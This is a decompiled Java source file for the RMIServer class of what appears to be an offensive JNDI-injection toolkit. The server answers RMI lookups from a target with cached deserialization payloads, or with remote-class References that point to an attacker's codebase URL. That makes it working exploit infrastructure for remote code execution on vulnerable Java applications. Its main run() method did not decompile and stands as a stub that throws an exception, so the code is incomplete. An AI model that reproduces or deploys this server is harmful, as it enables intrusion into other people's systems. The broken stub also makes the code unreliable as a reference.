package com.ar3h.chains.web.jndi;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.web.jndi.core.Cache;
import com.ar3h.chains.web.jndi.core.JndiData;
import com.ar3h.chains.web.jndi.core.JndiType;
import com.ar3h.chains.web.jndi.utils.Config;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLClassLoader;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObject;
import java.rmi.server.UID;
import java.util.Arrays;
import javax.naming.Reference;
import javax.net.ServerSocketFactory;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import sun.rmi.server.UnicastServerRef;

/* loaded from: input_file:BOOT-INF/classes/com/ar3h/chains/web/jndi/RMIServer.class */
public class RMIServer implements Runnable {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) RMIServer.class);
    public String ip;
    public int port;
    private ServerSocket ss;
    private final Object waitLock = new Object();
    private boolean exit;
    private boolean hadConnection;
    private static RMIServer serverInstance;

    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: input_file:BOOT-INF/classes/com/ar3h/chains/web/jndi/RMIServer$MarshalOutputStream.class */
    public static final class MarshalOutputStream extends ObjectOutputStream {
        private String sendUrl;

        public MarshalOutputStream(OutputStream outputStream, String str) throws IOException {
            super(outputStream);
            this.sendUrl = str;
        }

        MarshalOutputStream(OutputStream outputStream) throws IOException {
            super(outputStream);
        }

        @Override // java.io.ObjectOutputStream
        protected void annotateClass(Class<?> cls) throws IOException {
            if (this.sendUrl != null) {
                writeObject(this.sendUrl);
                return;
            }
            if (!(cls.getClassLoader() instanceof URLClassLoader)) {
                writeObject(null);
                return;
            }
            String str = "";
            for (URL url : ((URLClassLoader) cls.getClassLoader()).getURLs()) {
                str = str + url.toString();
            }
            writeObject(str);
        }

        @Override // java.io.ObjectOutputStream
        protected void annotateProxyClass(Class<?> cls) throws IOException {
            annotateClass(cls);
        }
    }

    public RMIServer(String str, int i) {
        try {
            this.ip = str;
            this.port = i;
            this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static synchronized void start() {
        if (Config.rmiPort <= 0) {
            log.info("[RMI Server] rmiPort is {}, skipping to start RMI Server", Integer.valueOf(Config.rmiPort));
        } else if (serverInstance != null) {
            log.warn("[RMI Server] is already running.");
        } else {
            serverInstance = new RMIServer(Config.listenIp, Config.rmiPort);
            new Thread(serverInstance).start();
        }
    }

    public static synchronized void stop() {
        if (serverInstance != null) {
            serverInstance.exit = true;
            try {
                serverInstance.ss.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
            serverInstance = null;
            log.info("[RMI Server] stopped.");
        }
    }

    public boolean waitFor(int i) {
        try {
            if (this.hadConnection) {
                return true;
            }
            log.info("[RMI Server] Waiting for connection");
            synchronized (this.waitLock) {
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        } catch (InterruptedException e) {
            return false;
        }
    }

    public void close() {
        this.exit = true;
        try {
            this.ss.close();
        } catch (IOException e) {
        }
        synchronized (this.waitLock) {
            this.waitLock.notify();
        }
    }

    /* JADX WARN: Failed to find 'out' block for switch in B:37:0x00fb. Please report as an issue. */
    /* JADX WARN: Finally extract failed */
    /* JADX WARN: Removed duplicated region for block: B:150:0x02e7 A[Catch: SocketException -> 0x031a, Exception -> 0x031e, TryCatch #16 {SocketException -> 0x031a, Exception -> 0x031e, blocks: (B:4:0x0015, B:6:0x001c, B:9:0x0028, B:12:0x006a, B:14:0x0080, B:34:0x00d3, B:36:0x00f2, B:37:0x00fb, B:63:0x0114, B:65:0x0122, B:66:0x013a, B:92:0x012e, B:67:0x0154, B:68:0x01c5, B:74:0x01d9, B:72:0x01ed, B:77:0x01e3, B:84:0x0230, B:82:0x0244, B:87:0x023a, B:88:0x027d, B:89:0x0280, B:39:0x0160, B:45:0x0178, B:43:0x018c, B:48:0x0182, B:55:0x019b, B:53:0x01af, B:58:0x01a5, B:59:0x01b4, B:60:0x01b7, B:97:0x01fd, B:106:0x020a, B:104:0x021e, B:109:0x0214, B:111:0x0225, B:19:0x009b, B:25:0x00a9, B:23:0x00bd, B:28:0x00b3, B:29:0x00c2, B:30:0x00c5, B:116:0x0254, B:124:0x0261, B:122:0x0275, B:127:0x026b, B:129:0x027c, B:130:0x0062, B:136:0x028f, B:138:0x02a1, B:139:0x02a5, B:141:0x02ac, B:145:0x02b5, B:146:0x02bf, B:132:0x02cf, B:133:0x02d2, B:134:0x02df, B:150:0x02e7, B:151:0x02eb, B:153:0x02f2, B:160:0x0302, B:161:0x0306, B:163:0x030d, B:165:0x0316), top: B:3:0x0015 }] */
    /* JADX WARN: Removed duplicated region for block: B:153:0x02f2 A[Catch: SocketException -> 0x031a, Exception -> 0x031e, TryCatch #16 {SocketException -> 0x031a, Exception -> 0x031e, blocks: (B:4:0x0015, B:6:0x001c, B:9:0x0028, B:12:0x006a, B:14:0x0080, B:34:0x00d3, B:36:0x00f2, B:37:0x00fb, B:63:0x0114, B:65:0x0122, B:66:0x013a, B:92:0x012e, B:67:0x0154, B:68:0x01c5, B:74:0x01d9, B:72:0x01ed, B:77:0x01e3, B:84:0x0230, B:82:0x0244, B:87:0x023a, B:88:0x027d, B:89:0x0280, B:39:0x0160, B:45:0x0178, B:43:0x018c, B:48:0x0182, B:55:0x019b, B:53:0x01af, B:58:0x01a5, B:59:0x01b4, B:60:0x01b7, B:97:0x01fd, B:106:0x020a, B:104:0x021e, B:109:0x0214, B:111:0x0225, B:19:0x009b, B:25:0x00a9, B:23:0x00bd, B:28:0x00b3, B:29:0x00c2, B:30:0x00c5, B:116:0x0254, B:124:0x0261, B:122:0x0275, B:127:0x026b, B:129:0x027c, B:130:0x0062, B:136:0x028f, B:138:0x02a1, B:139:0x02a5, B:141:0x02ac, B:145:0x02b5, B:146:0x02bf, B:132:0x02cf, B:133:0x02d2, B:134:0x02df, B:150:0x02e7, B:151:0x02eb, B:153:0x02f2, B:160:0x0302, B:161:0x0306, B:163:0x030d, B:165:0x0316), top: B:3:0x0015 }] */
    /* JADX WARN: Removed duplicated region for block: B:70:0x01d4  */
    /* JADX WARN: Removed duplicated region for block: B:80:0x022b  */
    @Override // java.lang.Runnable
    /*
        Code decompiled incorrectly, please refer to instructions dump.
        To view partially-correct add '--show-bad-code' argument
    */
    public void run() {
        /*
            Method dump skipped, instructions count: 807
            To view this dump add '--comments-level debug' option
        */
        throw new UnsupportedOperationException("Method not decompiled: com.ar3h.chains.web.jndi.RMIServer.run():void");
    }

    private void doMessage(Socket socket, DataInputStream dataInputStream, DataOutputStream dataOutputStream) throws Exception {
        log.info("[RMI Server] Reading message...");
        int read = dataInputStream.read();
        switch (read) {
            case 80:
                doCall(socket, dataInputStream, dataOutputStream);
                break;
            case 81:
            case 83:
            default:
                throw new IOException("unknown transport op " + read);
            case 82:
                dataOutputStream.writeByte(83);
                break;
            case 84:
                UID.read(dataInputStream);
                break;
        }
        socket.close();
    }

    private void doCall(Socket socket, DataInputStream dataInputStream, DataOutputStream dataOutputStream) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(dataInputStream) { // from class: com.ar3h.chains.web.jndi.RMIServer.1
            @Override // java.io.ObjectInputStream
            protected Class<?> resolveClass(ObjectStreamClass objectStreamClass) throws IOException {
                if ("[Ljava.rmi.server.ObjID;".equals(objectStreamClass.getName())) {
                    return ObjID[].class;
                }
                if ("java.rmi.server.ObjID".equals(objectStreamClass.getName())) {
                    return ObjID.class;
                }
                if ("java.rmi.server.UID".equals(objectStreamClass.getName())) {
                    return UID.class;
                }
                if ("java.lang.String".equals(objectStreamClass.getName())) {
                    return String.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            ObjID read = ObjID.read(objectInputStream);
            if (read.hashCode() == 2) {
                handleDGC(objectInputStream);
                return;
            }
            if (read.hashCode() == 0) {
                if (!handleRMI(socket, objectInputStream, dataOutputStream)) {
                    socket.close();
                    return;
                }
                this.hadConnection = true;
                synchronized (this.waitLock) {
                    this.waitLock.notifyAll();
                }
            }
        } catch (IOException e) {
            throw new MarshalException("unable to read objID", e);
        }
    }

    private boolean handleRMI(Socket socket, ObjectInputStream objectInputStream, DataOutputStream dataOutputStream) throws Exception {
        Object obj;
        int readInt = objectInputStream.readInt();
        objectInputStream.readLong();
        if (readInt != 2) {
            return false;
        }
        String str = (String) objectInputStream.readObject();
        log.info("[RMI Server] Is RMI.lookup call for object:{} , method: {}", str, Integer.valueOf(readInt));
        dataOutputStream.writeByte(81);
        MarshalOutputStream marshalOutputStream = new MarshalOutputStream(dataOutputStream, Config.codeBase);
        Throwable th = null;
        try {
            marshalOutputStream.writeByte(1);
            new UID().write(marshalOutputStream);
            log.info("[RMI Server] Send payloadData for " + ("/" + str));
            new Object();
            JndiData jndiData = Cache.jndiDataMap.get(str);
            if (jndiData == null) {
                log.info("'{}' not found in jndiDataMap, using DEFAULT key instead of", str);
                jndiData = Cache.jndiDataMap.get("DEFAULT");
            }
            if (jndiData == null) {
                log.warn("jndiDataMap DEFAULT_KEY payload is null, plz regenerate jndi payload");
                if (marshalOutputStream != null) {
                    if (0 != 0) {
                        try {
                            marshalOutputStream.close();
                        } catch (Throwable th2) {
                            th.addSuppressed(th2);
                        }
                    } else {
                        marshalOutputStream.close();
                    }
                }
                return false;
            }
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(new Reference(""));
            Object data = jndiData.getData();
            if (JndiType.RMIDeserialize.equals(jndiData.getType())) {
                obj = data;
            } else {
                if (data instanceof Reference) {
                    referenceWrapper = new ReferenceWrapper((Reference) data);
                } else if (data instanceof byte[]) {
                    String string = jndiData.getContext().getString(ContextTag.CLASS_NAME_KEY);
                    Cache.set(string, (byte[]) jndiData.getData());
                    log.info("[{}] Bytecode className: {}", str, string);
                    referenceWrapper = new ReferenceWrapper(new Reference("foo", string, Config.codeBase));
                } else {
                    log.error("Unsupported Object Type: {}", data.getClass().getName());
                }
                Field declaredField = RemoteObject.class.getDeclaredField("ref");
                declaredField.setAccessible(true);
                declaredField.set(referenceWrapper, new UnicastServerRef(12345));
                obj = referenceWrapper;
            }
            marshalOutputStream.writeObject(obj);
            marshalOutputStream.flush();
            dataOutputStream.flush();
            if (marshalOutputStream == null) {
                return true;
            }
            if (0 == 0) {
                marshalOutputStream.close();
                return true;
            }
            try {
                marshalOutputStream.close();
                return true;
            } catch (Throwable th3) {
                th.addSuppressed(th3);
                return true;
            }
        } catch (Throwable th4) {
            if (marshalOutputStream != null) {
                if (0 != 0) {
                    try {
                        marshalOutputStream.close();
                    } catch (Throwable th5) {
                        th.addSuppressed(th5);
                    }
                } else {
                    marshalOutputStream.close();
                }
            }
            throw th4;
        }
    }

    private static void handleDGC(ObjectInputStream objectInputStream) throws IOException, ClassNotFoundException {
        objectInputStream.readInt();
        objectInputStream.readLong();
        log.info("[RMI Server] Is DGC call for " + Arrays.toString((ObjID[]) objectInputStream.readObject()));
    }
}
